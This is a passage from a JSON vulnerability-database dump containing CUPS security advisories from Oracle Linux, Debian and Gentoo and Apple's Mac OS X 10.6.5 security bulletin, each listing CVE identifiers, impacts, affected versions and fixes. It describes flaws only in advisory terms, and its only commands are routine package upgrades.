corruption vulnerability\r\n (CVE-2010-2941, STR #3648, bug #624438).\r\n- Fix latent privilege escalation vulnerability (CVE-2010-2431,\r\n STR #3510, bug #605397).", "modified": "2010-10-29T00:00:00", "published": "2010-10-29T00:00:00", "id": "ELSA-2010-0811", "href": "http://linux.oracle.com/errata/ELSA-2010-0811.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:10", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2176-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 02, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2008-5183 CVE-2009-3553 CVE-2010-0540 CVE-2010-0542 CVE-2010-1748 CVE-2010-2431 CVE-2010-2432 CVE-2010-2941\n\nSeveral vulnerabilities have been discovered in the Common UNIX Printing\nSystem:\n\nCVE-2008-5183\n\n A null pointer dereference in RSS job completion notifications\n could lead to denial of service.\n\nCVE-2009-3553\n\n It was discovered that incorrect file descriptor handling\n could lead to denial of service.\n\nCVE-2010-0540\n\n A cross-site request forgery vulnerability was discovered in\n the web interface.\n\nCVE-2010-0542\n\n Incorrect memory management in the filter subsystem could lead\n to denial of service.\n\nCVE-2010-1748\n\n Information disclosure in the web interface.\n \nCVE-2010-2431\n \n Emmanuel Bouillon discovered a symlink vulnerability in handling\n of cache files.\n\nCVE-2010-2432\n\n Denial of service in the authentication code.\n\nCVE-2010-2941\n\n Incorrect memory management in the IPP code could lead to denial\n of service or the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.3.8-1+lenny9.\n\nThe stable distribution (squeeze) and the unstable distribution (sid)\nhad already been fixed prior to the initial Squeeze release.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2011-03-01T23:30:56", "published": "2011-03-01T23:30:56", "id": "DEBIAN:DSA-2176-1:CBD37", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00043.html", "title": "[SECURITY] [DSA 2176-1] cups security update", "type": "debian", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in CUPS. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code using specially crafted streams, IPP requests or files, or cause a Denial of Service (daemon crash or hang). A local attacker may be able to gain escalated privileges or overwrite arbitrary files. Furthermore, a remote attacker may be able to obtain sensitive information from the CUPS process or hijack a CUPS administrator authentication request. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-1.4.8-r1\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since September 03, 2011. It is likely that your system is already no longer affected by this issue.", "modified": "2012-07-09T00:00:00", "published": "2012-07-09T00:00:00", "id": "GLSA-201207-10", "href": "https://security.gentoo.org/glsa/201207-10", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "description": "Multiple vulnerabilities in kernel, networking components, printing services, AFP Server, AppKit, Apple Type Services, CFNetwork, CoreGraphics, CoreText, Directory Services, diskdev_cmds, Disk Images, Image Capture, ImageIO, Image RAW, Password Server, QuickLook, QuickTime, Safari RSS, Time Machine, Wiki Server, X11 and third party applications.", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:VULN:11263", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11263", "title": "Apple Mac OS X and QuickTime multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shutdown\r\n\r\n Description: A null pointer dereference exists in AFP Server's handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shutdown. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. This issue is addressed through improved path validation. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl's encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services' handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork's URL handling code. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork's handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue by through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText's handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol (IPP) requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services' password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists fsck_hfs' handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees. Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip's handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: A unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6. Credit to Steven Fisher of Discovery Software Ltd. for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO's handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW's handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast (PIM) packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL's certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server's handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API's handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exists in python's rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook's handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint's Zero Day 